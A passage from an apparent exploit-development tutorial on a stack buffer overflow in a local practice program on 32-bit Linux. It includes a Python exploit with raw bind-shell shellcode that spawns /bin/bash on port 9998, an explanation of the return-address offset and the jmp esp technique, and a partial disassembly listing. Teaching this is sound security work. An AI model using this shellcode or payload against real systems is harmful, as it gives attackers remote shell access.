class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spancat app-net-exploit.py /span span class="code-line"span class="gp"#/span!/usr/bin/env python/span span class="code-line"/span span class="code-line"span class="go"import socket/span/span span class="code-line"/span span class="code-line"span class="go"shellcode = quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80quot;/span/span span class="code-line"/span span class="code-line"span class="go"payload = quot;\x90quot; * 406 # (532 - 119) - 7 = 406/span/span span class="code-line"/span span class="code-line"span class="go"payload += shellcode # append our shellcode/span/span span class="code-line"/span span class="code-line"span class="go"payload += quot;\x90quot; * 7 # another 7 bytes/span/span span class="code-line"/span span class="code-line"span class="go"payload += quot;\x94\xb6\xae\xbfquot; # the address of our shellcode/span/span span class="code-line"span class="gp" # /spanspan class="k"in/span reverse span class="o"(/spanlittle endianspan class="o")/span/span span class="code-line"/span span class="code-line"span class="gp"# /spancreate the tcp socket/span span class="code-line"span class="go"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)/span/span span class="code-line"/span span class="code-line"span class="gp"# /spanconnect to span class="m"127/span.0.0.1 port span class="m"9999/span/span span class="code-line"span class="go"s.connect((quot;127.0.0.1quot;, 9999))/span/span span class="code-line"/span span class="code-line"span class="gp"# /spansend our payload/span span class="code-line"span class="go"s.send(payload)/span/span span class="code-line"/span span class="code-line"span class="gp"# /spanclose the socket/span span class="code-line"span class="go"s.close()/span/span span class="code-line"span class="gp"testuser@dev:~$ /spanpython app-net-exploit.py /span span class="code-line"span class="gp"testuser@dev:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"nc: unable to connect to address 127.0.0.1, service 9998/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see, the exploit that we used last time didn't work. The reason for this is because the position of the stack has moved, so the shellcode isn't at the same address everytime the application is launched./p pThe offset here before we start overwriting EIP is 532. I want to explain quickly why this is./p pWe have 3 local variables, codechar p[512];/code (on line 100 of the source) and codeint r, i;/code (on line 101)./p pThese variables go on to the stack in reverse order, so first (closest to the beginning of the a href="https://en.wikipedia.org/wiki/Call_stack#Structure" target="_blank"stack frame/a) codei/code, then coder/code and lastly codep/code./p pWhen writes happen here they happen in the opposite direction, so a write at codep/code will eventually overwrite coder/code (after filling up the reserved space for codep/code) and then codei/code./p pWe are reserving 512 bytes for codep/code, each int is 4 bytes long, so that is 520. The stack has to be aligned to 16 byte boundaries, so we need to add another 8 bytes, making it 528 bytes./p pLastly right under the local variables we have the saved EBP from the calling function, this is another 4 bytes. The return address is stored right after the saved EBP so that takes us to 532 bytes./p h2Returning From A Function/h2 pI explained this in much more detail in part a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"4/a but just before a function returns, the stack looks like this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pThe strongRET ADDR/strong is what we are overwriting to take control of EIP. What happens next is the strongRET ADDR/strong gets strongpopped/strong off of the stack into the EIP register and the stack then looks like this:/p pimg src="/assets/images/x86-32-linux/stack1.jpg" width="300"/p pThis means that the value of the ESP register will always point to the memory address on the stack right after we overwrite EIP, at 536 bytes into our payload (532 + 4 for EIP)./p pSo if we write our shellcode after we overwrite EIP then we know that ESP is pointing to it./p pAn instruction that is fairly common among all normal sized applications is codejmp esp/code. This instruction tells EIP to point to the address that ESP is pointing to./p pUsing this instruction we can execute our shellcode but first we have to find it in the application's a href="https://en.wikipedia.org/wiki/Code_segment" target="_blank"text segment/a because we know it will never change address if it is in this section./p h2Finding JMP ESP/h2 pFirst let's look at the disassembly using codeobjdump -d ./app-net -M intel/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/span span class="code-line"span class="normal"137/span/span span class="code-line"span class="normal"138/span/span span class="code-line"span class="normal"139/span/span span class="code-line"span class="normal"140/span/span span class="code-line"span class="normal"141/span/span span class="code-line"span class="normal"142/span/span span class="code-line"span class="normal"143/span/span span class="code-line"span class="normal"144/span/span span class="code-line"span class="normal"145/span/span span class="code-line"span class="normal"146/span/span span class="code-line"span class="normal"147/span/span span class="code-line"span class="normal"148/span/span span class="code-line"span class="normal"149/span/span span class="code-line"span class="normal"150/span/span span class="code-line"span class="normal"151/span/span span class="code-line"span class="normal"152/span/span span class="code-line"span class="normal"153/span/span span class="code-line"span class="normal"154/span/span span class="code-line"span class="normal"155/span/span span class="code-line"span class="normal"156/span/span span class="code-line"span class="normal"157/span/span span class="code-line"span class="normal"158/span/span span class="code-line"span class="normal"159/span/span span class="code-line"span class="normal"160/span/span span class="code-line"span class="normal"161/span/span span class="code-line"span class="normal"162/span/span span class="code-line"span class="normal"163/span/span span class="code-line"span class="normal"164/span/span span class="code-line"span class="normal"165/span/span span class="code-line"span class="normal"166/span/span span class="code-line"span class="normal"167/span/span span class="code-line"span class="normal"168/span/span span class="code-line"span class="normal"169/span/span span class="code-line"span class="normal"170/span/span span class="code-line"span class="normal"171/span/span span class="code-line"span class="normal"172/span/span span class="code-line"span class="normal"173/span/span span class="code-line"span class="normal"174/span/span span class="code-line"span class="normal"175/span/span span class="code-line"span class="normal"176/span/span span class="code-line"span class="normal"177/span/span span class="code-line"span class="normal"178/span/span span class="code-line"span class="normal"179/span/span span class="code-line"span class="normal"180/span/span span class="code-line"span class="normal"181/span/span span class="code-line"span class="normal"182/span/span span class="code-line"span class="normal"183/span/span span class="code-line"span class="normal"184/span/span span class="code-line"span class="normal"185/span/span span class="code-line"span class="normal"186/span/span span class="code-line"span class="normal"187/span/span span class="code-line"span class="normal"188/span/span span class="code-line"span class="normal"189/span/span span class="code-line"span class="normal"190/span/span span class="code-line"span class="normal"191/span/span span class="code-line"span class="normal"192/span/span span class="code-line"span class="normal"193/span/span span class="code-line"span class="normal"194/span/span span class="code-line"span class="normal"195/span/span span class="code-line"span class="normal"196/span/span span class="code-line"span class="normal"197/span/span span class="code-line"span class="normal"198/span/span span class="code-line"span class="normal"199/span/span span class="code-line"span class="normal"200/span/span span class="code-line"span class="normal"201/span/span span class="code-line"span class="normal"202/span/span span class="code-line"span class="normal"203/span/span span class="code-line"span class="normal"204/span/span span class="code-line"span class="normal"205/span/span span class="code-line"span class="normal"206/span/span span class="code-line"span class="normal"207/span/span span class="code-line"span class="normal"208/span/span span class="code-line"span class="normal"209/span/span span class="code-line"span class="normal"210/span/span span class="code-line"span class="normal"211/span/span span class="code-line"span class="normal"212/span/span span class="code-line"span class="normal"213/span/span span class="code-line"span class="normal"214/span/span span class="code-line"span class="normal"215/span/span span class="code-line"span class="normal"216/span/span span class="code-line"span class="normal"217/span/span span class="code-line"span class="normal"218/span/span span class="code-line"span class="normal"219/span/span span class="code-line"span class="normal"220/span/span span class="code-line"span class="normal"221/span/span span class="code-line"span class="normal"222/span/span span class="code-line"span class="normal"223/span/span span class="code-line"span class="normal"224/span/span span class="code-line"span class="normal"225/span/span span class="code-line"span class="normal"226/span/span span class="code-line"span class="normal"227/span/span span class="code-line"span class="normal"228/span/span span class="code-line"span class="normal"229/span/span span class="code-line"span class="normal"230/span/span span class="code-line"span class="normal"231/span/span span class="code-line"span class="normal"232/span/span span class="code-line"span class="normal"233/span/span span class="code-line"span class="normal"234/span/span span class="code-line"span class="normal"235/span/span span class="code-line"span class="normal"236/span/span span class="code-line"span class="normal"237/span/span span class="code-line"span class="normal"238/span/span span class="code-line"span class="normal"239/span/span span class="code-line"span class="normal"240/span/span span class="code-line"span class="normal"241/span/span span class="code-line"span class="normal"242/span/span span class="code-line"span class="normal"243/span/span span class="code-line"span class="normal"244/span/span span class="code-line"span class="normal"245/span/span span class="code-line"span class="normal"246/span/span span class="code-line"span class="normal"247/span/span span class="code-line"span class="normal"248/span/span span class="code-line"span class="normal"249/span/span span class="code-line"span class="normal"250/span/span span class="code-line"span class="normal"251/span/span span class="code-line"span class="normal"252/span/span span class="code-line"span class="normal"253/span/span span class="code-line"span class="normal"254/span/span span class="code-line"span class="normal"255/span/span span class="code-line"span class="normal"256/span/span span class="code-line"span class="normal"257/span/span span class="code-line"span class="normal"258/span/span span class="code-line"span class="normal"259/span/span span class="code-line"span class="normal"260/span/span span class="code-line"span class="normal"261/span/span span class="code-line"span class="normal"262/span/span span class="code-line"span class="normal"263/span/span span class="code-line"span class="normal"264/span/span span class="code-line"span class="normal"265/span/span span class="code-line"span class="normal"266/span/span span class="code-line"span class="normal"267/span/span span class="code-line"span class="normal"268/span/span span class="code-line"span class="normal"269/span/span span class="code-line"span class="normal"270/span/span span class="code-line"span class="normal"271/span/span span class="code-line"span class="normal"272/span/span span class="code-line"span class="normal"273/span/span span class="code-line"span class="normal"274/span/span span class="code-line"span class="normal"275/span/span span class="code-line"span class="normal"276/span/span span class="code-line"span class="normal"277/span/span span class="code-line"span class="normal"278/span/span span class="code-line"span class="normal"279/span/span span class="code-line"span class="normal"280/span/span span class="code-line"span class="normal"281/span/span span class="code-line"span class="normal"282/span/span span class="code-line"span class="normal"283/span/span span class="code-line"span class="normal"284/span/span span class="code-line"span class="normal"285/span/span span class="code-line"span class="normal"286/span/span span class="code-line"span class="normal"287/span/span span class="code-line"span class="normal"288/span/span span class="code-line"span class="normal"289/span/span span class="code-line"span class="normal"290/span/span span class="code-line"span class="normal"291/span/span span class="code-line"span class="normal"292/span/span span class="code-line"span class="normal"293/span/span span class="code-line"span class="normal"294/span/span span class="code-line"span class="normal"295/span/span span class="code-line"span class="normal"296/span/span span class="code-line"span class="normal"297/span/span span class="code-line"span class="normal"298/span/span span class="code-line"span class="normal"299/span/span span class="code-line"span class="normal"300/span/span span class="code-line"span class="normal"301/span/span span class="code-line"span class="normal"302/span/span span class="code-line"span class="normal"303/span/span span class="code-line"span class="normal"304/span/span span class="code-line"span class="normal"305/span/span span class="code-line"span class="normal"306/span/span span class="code-line"span class="normal"307/span/span span class="code-line"span class="normal"308/span/span span class="code-line"span class="normal"309/span/span span class="code-line"span class="normal"310/span/span span class="code-line"span class="normal"311/span/span span class="code-line"span class="normal"312/span/span span class="code-line"span class="normal"313/span/span span class="code-line"span class="normal"314/span/span span class="code-line"span class="normal"315/span/span span class="code-line"span class="normal"316/span/span span class="code-line"span class="normal"317/span/span span class="code-line"span class="normal"318/span/span span class="code-line"span class="normal"319/span/span span class="code-line"span class="normal"320/span/span span class="code-line"span class="normal"321/span/span span class="code-line"span class="normal"322/span/span span class="code-line"span class="normal"323/span/span span class="code-line"span class="normal"324/span/span span class="code-line"span class="normal"325/span/span span class="code-line"span class="normal"326/span/span span class="code-line"span class="normal"327/span/span span class="code-line"span class="normal"328/span/span span class="code-line"span class="normal"329/span/span span class="code-line"span class="normal"330/span/span span class="code-line"span class="normal"331/span/span span class="code-line"span class="normal"332/span/span span class="code-line"span class="normal"333/span/span span class="code-line"span class="normal"334/span/span span class="code-line"span class="normal"335/span/span span class="code-line"span class="normal"336/span/span span class="code-line"span class="normal"337/span/span span class="code-line"span class="normal"338/span/span span class="code-line"span class="normal"339/span/span span class="code-line"span class="normal"340/span/span span class="code-line"span class="normal"341/span/span span class="code-line"span class="normal"342/span/span span class="code-line"span class="normal"343/span/span span class="code-line"span class="normal"344/span/span span class="code-line"span class="normal"345/span/span span class="code-line"span class="normal"346/span/span span class="code-line"span class="normal"347/span/span span class="code-line"span class="normal"348/span/span span class="code-line"span class="normal"349/span/span span class="code-line"span class="normal"350/span/span span class="code-line"span class="normal"351/span/span span class="code-line"span class="normal"352/span/span span class="code-line"span class="normal"353/span/span span class="code-line"span class="normal"354/span/span span class="code-line"span class="normal"355/span/span span class="code-line"span class="normal"356/span/span span class="code-line"span class="normal"357/span/span span class="code-line"span class="normal"358/span/span span class="code-line"span class="normal"359/span/span span class="code-line"span class="normal"360/span/span span class="code-line"span class="normal"361/span/span span class="code-line"span class="normal"362/span/span span class="code-line"span class="normal"363/span/span span class="code-line"span class="normal"364/span/span span class="code-line"span class="normal"365/span/span span class="code-line"span class="normal"366/span/span span class="code-line"span class="normal"367/span/span span class="code-line"span class="normal"368/span/span span class="code-line"span class="normal"369/span/span span class="code-line"span class="normal"370/span/span span class="code-line"span class="normal"371/span/span span class="code-line"span class="normal"372/span/span span class="code-line"span class="normal"373/span/span span class="code-line"span class="normal"374/span/span span class="code-line"span class="normal"375/span/span span class="code-line"span class="normal"376/span/span span class="code-line"span class="normal"377/span/span span class="code-line"span class="normal"378/span/span span class="code-line"span class="normal"379/span/span span class="code-line"span class="normal"380/span/span span class="code-line"span class="normal"381/span/span span class="code-line"span class="normal"382/span/span span class="code-line"span class="normal"383/span/span span class="code-line"span class="normal"384/span/span span class="code-line"span class="normal"385/span/span span class="code-line"span class="normal"386/span/span span class="code-line"span class="normal"387/span/span span class="code-line"span class="normal"388/span/span span class="code-line"span class="normal"389/span/span span class="code-line"span class="normal"390/span/span span class="code-line"span class="normal"391/span/span span class="code-line"span class="normal"392/span/span span class="code-line"span class="normal"393/span/span span class="code-line"span class="normal"394/span/span span class="code-line"span class="normal"395/span/span span class="code-line"span class="normal"396/span/span span class="code-line"span class="normal"397/span/span span class="code-line"span class="normal"398/span/span span class="code-line"span class="normal"399/span/span span class="code-line"span class="normal"400/span/span span class="code-line"span class="normal"401/span/span span class="code-line"span class="normal"402/span/span span class="code-line"span class="normal"403/span/span span class="code-line"span class="normal"404/span/span span class="code-line"span class="normal"405/span/span span class="code-line"span class="normal"406/span/span span class="code-line"span class="normal"407/span/span span class="code-line"span class="normal"408/span/span span class="code-line"span class="normal"409/span/span span class="code-line"span class="normal"410/span/span span class="code-line"span class="normal"411/span/span span class="code-line"span class="normal"412/span/span span class="code-line"span class="normal"413/span/span span class="code-line"span class="normal"414/span/span span class="code-line"span class="normal"415/span/span span class="code-line"span class="normal"416/span/span span class="code-line"span class="normal"417/span/span span class="code-line"span class="normal"418/span/span span class="code-line"span class="normal"419/span/span span class="code-line"span class="normal"420/span/span span class="code-line"span class="normal"421/span/span span class="code-line"span class="normal"422/span/span span class="code-line"span class="normal"423/span/span span class="code-line"span class="normal"424/span/span span class="code-line"span class="normal"425/span/span span class="code-line"span class="normal"426/span/span span class="code-line"span class="normal"427/span/span span class="code-line"span class="normal"428/span/span span class="code-line"span class="normal"429/span/span span class="code-line"span class="normal"430/span/span span class="code-line"span class="normal"431/span/span span class="code-line"span class="normal"432/span/span span class="code-line"span class="normal"433/span/span span class="code-line"span class="normal"434/span/span span class="code-line"span class="normal"435/span/span span class="code-line"span class="normal"436/span/span span class="code-line"span class="normal"437/span/span span class="code-line"span class="normal"438/span/span span class="code-line"span class="normal"439/span/span span class="code-line"span class="normal"440/span/span span class="code-line"span class="normal"441/span/span span class="code-line"span class="normal"442/span/span span class="code-line"span class="normal"443/span/span span class="code-line"span class="normal"444/span/span span class="code-line"span class="normal"445/span/span span class="code-line"span class="normal"446/span/span span class="code-line"span class="normal"447/span/span span class="code-line"span class="normal"448/span/span span class="code-line"span class="normal"449/span/span span class="code-line"span class="normal"450/span/span span class="code-line"span class="normal"451/span/span span class="code-line"span class="normal"452/span/span span class="code-line"span class="normal"453/span/span span class="code-line"span class="normal"454/span/span span class="code-line"span class="normal"455/span/span span class="code-line"span class="normal"456/span/span span class="code-line"span class="normal"457/span/span span class="code-line"span class="normal"458/span/span span class="code-line"span class="normal"459/span/span span class="code-line"span class="normal"460/span/span span class="code-line"span class="normal"461/span/span span class="code-line"span class="normal"462/span/span span class="code-line"span class="normal"463/span/span span class="code-line"span class="normal"464/span/span span class="code-line"span class="normal"465/span/span span class="code-line"span class="normal"466/span/span span class="code-line"span class="normal"467/span/span span class="code-line"span class="normal"468/span/span span class="code-line"span class="normal"469/span/span span class="code-line"span class="normal"470/span/span span class="code-line"span class="normal"471/span/span span class="code-line"span class="normal"472/span/span span class="code-line"span class="normal"473/span/span span class="code-line"span class="normal"474/span/span span class="code-line"span class="normal"475/span/span span class="code-line"span class="normal"476/span/span span class="code-line"span class="normal"477/span/span span class="code-line"span class="normal"478/span/span span class="code-line"span class="normal"479/span/span span class="code-line"span class="normal"480/span/span span class="code-line"span class="normal"481/span/span span class="code-line"span class="normal"482/span/span span class="code-line"span class="normal"483/span/span span class="code-line"span class="normal"484/span/span span class="code-line"span class="normal"485/span/span span class="code-line"span class="normal"486/span/span span class="code-line"span class="normal"487/span/span span class="code-line"span class="normal"488/span/span span class="code-line"span class="normal"489/span/span span class="code-line"span class="normal"490/span/span span class="code-line"span class="normal"491/span/span span class="code-line"span class="normal"492/span/span span class="code-line"span class="normal"493/span/span span class="code-line"span class="normal"494/span/span span class="code-line"span class="normal"495/span/span span class="code-line"span class="normal"496/span/span span class="code-line"span class="normal"497/span/span span class="code-line"span class="normal"498/span/span span class="code-line"span class="normal"499/span/span span class="code-line"span class="normal"500/span/span span class="code-line"span class="normal"501/span/span span class="code-line"span class="normal"502/span/span span class="code-line"span class="normal"503/span/span span class="code-line"span class="normal"504/span/span span class="code-line"span class="normal"505/span/span span class="code-line"span class="normal"506/span/span span class="code-line"span class="normal"507/span/span span class="code-line"span class="normal"508/span/span span class="code-line"span class="normal"509/span/span span class="code-line"span class="normal"510/span/span span class="code-line"span class="normal"511/span/span span class="code-line"span class="normal"512/span/span span class="code-line"span class="normal"513/span/span span class="code-line"span class="normal"514/span/span span class="code-line"span class="normal"515/span/span span class="code-line"span class="normal"516/span/span span class="code-line"span class="normal"517/span/span span class="code-line"span class="normal"518/span/span span class="code-line"span class="normal"519/span/span span class="code-line"span class="normal"520/span/span span class="code-line"span class="normal"521/span/span span class="code-line"span class="normal"522/span/span span class="code-line"span class="normal"523/span/span span class="code-line"span class="normal"524/span/span span class="code-line"span class="normal"525/span/span span class="code-line"span class="normal"526/span/span span class="code-line"span class="normal"527/span/span span class="code-line"span class="normal"528/span/span span class="code-line"span class="normal"529/span/span span class="code-line"span class="normal"530/span/span span class="code-line"span class="normal"531/span/span span class="code-line"span class="normal"532/span/span span class="code-line"span class="normal"533/span/span span class="code-line"span class="normal"534/span/span span class="code-line"span class="normal"535/span/span span class="code-line"span class="normal"536/span/span span class="code-line"span class="normal"537/span/span span class="code-line"span class="normal"538/span/span span class="code-line"span class="normal"539/span/span span class="code-line"span class="normal"540/span/span span class="code-line"span class="normal"541/span/span span class="code-line"span class="normal"542/span/span span class="code-line"span class="normal"543/span/span span class="code-line"span class="normal"544/span/span span class="code-line"span class="normal"545/span/span span class="code-line"span class="normal"546/span/span span class="code-line"span class="normal"547/span/span span class="code-line"span class="normal"548/span/span span class="code-line"span class="normal"549/span/span span class="code-line"span class="normal"550/span/span span class="code-line"span class="normal"551/span/span span class="code-line"span class="normal"552/span/span span class="code-line"span class="normal"553/span/span span class="code-line"span class="normal"554/span/span span class="code-line"span class="normal"555/span/span span class="code-line"span class="normal"556/span/span span class="code-line"span class="normal"557/span/span span class="code-line"span class="normal"558/span/span span class="code-line"span class="normal"559/span/span span class="code-line"span class="normal"560/span/span span class="code-line"span class="normal"561/span/span span class="code-line"span class="normal"562/span/span span class="code-line"span class="normal"563/span/span span class="code-line"span class="normal"564/span/span span class="code-line"span class="normal"565/span/span span class="code-line"span class="normal"566/span/span span class="code-line"span class="normal"567/span/span span class="code-line"span class="normal"568/span/span span class="code-line"span class="normal"569/span/span span class="code-line"span class="normal"570/span/span span class="code-line"span class="normal"571/span/span span class="code-line"span class="normal"572/span/span span class="code-line"span class="normal"573/span/span span class="code-line"span class="normal"574/span/span span class="code-line"span class="normal"575/span/span span class="code-line"span class="normal"576/span/span span class="code-line"span class="normal"577/span/span span class="code-line"span class="normal"578/span/span span class="code-line"span class="normal"579/span/span span class="code-line"span class="normal"580/span/span span class="code-line"span class="normal"581/span/span span class="code-line"span class="normal"582/span/span span class="code-line"span class="normal"583/span/span span class="code-line"span class="normal"584/span/span span class="code-line"span class="normal"585/span/span span class="code-line"span class="normal"586/span/span span class="code-line"span class="normal"587/span/span span class="code-line"span class="normal"588/span/span span class="code-line"span class="normal"589/span/span span class="code-line"span class="normal"590/span/span span class="code-line"span class="normal"591/span/span span class="code-line"span class="normal"592/span/span span class="code-line"span class="normal"593/span/span span class="code-line"span class="normal"594/span/span span class="code-line"span class="normal"595/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nl"./app-net/spanspan class="p":/span file format span class="s"elf32-i386/span/span span class="code-line"/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".init/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"080485e0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80485e0: 55 push ebp/span/span span class="code-line"span class="x" 80485e1: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80485e3: 53 push ebx/span/span span class="code-line"span class="x" 80485e4: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 80485e7: e8 00 00 00 00 call 80485ec lt;_init+0xcgt;/span/span span class="code-line"span class="x" 80485ec: 5b pop ebx/span/span span class="code-line"span class="x" 80485ed: 81 c3 14 0b 00 00 add ebx,0xb14/span/span span class="code-line"span class="x" 80485f3: 8b 93 fc ff ff ff mov edx,DWORD PTR [ebx-0x4]/span/span span class="code-line"span class="x" 80485f9: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 80485fb: 74 05 je 8048602 lt;_init+0x22gt;/span/span span class="code-line"span class="x" 80485fd: e8 ae 00 00 00 call 80486b0 lt;__gmon_start__@pltgt;/span/span span class="code-line"span class="x" 8048602: 58 pop eax/span/span span class="code-line"span class="x" 8048603: 5b pop ebx/span/span span class="code-line"span class="x" 8048604: c9 leave /span/span span class="code-line"span class="x" 8048605: c3 ret /span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".plt/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048610/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strcmp@plt/spanspan class="p"-/spanspan class="mh"0x10/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048610: ff 35 04 91 04 08 push DWORD PTR ds:0x8049104/span/span span class="code-line"span class="x" 8048616: ff 25 08 91 04 08 jmp DWORD PTR ds:0x8049108/span/span span class="code-line"span class="x" 804861c: 00 00 add BYTE PTR [eax],al/span/span span class="code-line"span class="x" .../span/span span class="code-line"/span span class="code-line"span class="mh"08048620/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strcmp@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048620: ff 25 0c 91 04 08 jmp DWORD PTR ds:0x804910c/span/span span class="code-line"span class="x" 8048626: 68 00 00 00 00 push 0x0/span/span span class="code-line"span class="x" 804862b: e9 e0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048630/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"printf@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048630: ff 25 10 91 04 08 jmp DWORD PTR ds:0x8049110/span/span span class="code-line"span class="x" 8048636: 68 08 00 00 00 push 0x8/span/span span class="code-line"span class="x" 804863b: e9 d0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048640/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"bzero@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048640: ff 25 14 91 04 08 jmp DWORD PTR ds:0x8049114/span/span span class="code-line"span class="x" 8048646: 68 10 00 00 00 push 0x10/span/span span class="code-line"span class="x" 804864b: e9 c0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048650/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"fclose@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048650: ff 25 18 91 04 08 jmp DWORD PTR ds:0x8049118/span/span span class="code-line"span class="x" 8048656: 68 18 00 00 00 push 0x18/span/span span class="code-line"span class="x" 804865b: e9 b0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span 